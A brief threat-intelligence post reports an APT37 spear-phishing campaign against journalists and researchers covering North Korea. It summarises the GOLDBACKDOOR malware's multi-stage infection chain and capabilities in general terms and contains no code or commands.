APT37 Targeting Journalists and Researchers

  |  Source: 
Information & Technology

APT37 Targeting Journalists and Researchers

NK News, an American news source reporting activities in North Korea, has identified of suspicious spear-phishing emails as a threat campaign by the North Korean threat group, APT37/Richochet Chollima. The campaign appears to be targeting journalists and researchers reporting sensitive issues within the country. The news organization engaged Stairwell's cybersecurity team, in March 2022, discovering a new malware named, GOLDBACKDOOR. The threat group employs a multi-stage infection process to evade defenses. A compressed file is attached to the suspicious email containing Windows LNK, shortcut files. When the shortcut files are executed, PowerShell scripts are launched presenting a decoy document to distract the victim whilst downloading and executing malicious shellcode. The downloaded payload, Fantasy, then conducts process injection to deploy GOLDBACKDOOR malware. GOLDBACKDOOR, is identified as a Windows Portable Executable (PE) file with a creation timestamp of February 9th, 2022, 02:38:30 UTC. As analyzed by Stairwell, "Embedded in the analyzed copy of GOLDBACKDOOR is a set of API keys used to authenticate against Azure and retrieve commands for execution. Received commands are prefixed with a single-character value, which denotes the corresponding task requested of the malware. GOLDBACKDOOR provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall."


Get trending threats published weekly by the Anvilogic team.

Sign Up Now